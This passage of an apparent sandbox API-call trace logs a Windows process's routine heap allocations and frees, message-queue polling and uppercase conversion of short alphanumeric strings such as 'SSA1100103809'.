hHeap=0x2af0000) returned 1 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730a8 [0090.233] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0090.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0090.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71688 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0090.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0090.234] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0090.234] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9efc) returned 0x2a8df40 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0090.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0090.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0090.235] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0090.235] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0090.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0090.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0090.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0090.236] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0090.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0090.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0090.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0090.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0090.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0090.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.236] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0090.236] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0090.242] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.242] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0090.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0090.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0090.242] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0090.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0090.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0090.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0090.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.246] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0090.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0090.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0090.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0090.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0090.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0090.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0090.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0090.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0090.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.248] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0090.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0090.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0090.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.248] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.248] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0090.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0090.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0090.249] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0090.249] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0090.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0090.249] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0090.249] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0090.249] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0090.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0090.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74790 [0090.250] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0090.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0090.250] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0090.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0090.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0090.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0090.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0090.250] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0090.250] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0090.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0090.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0090.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74790 | out: hHeap=0x2af0000) returned 1 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0090.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0090.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0090.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: 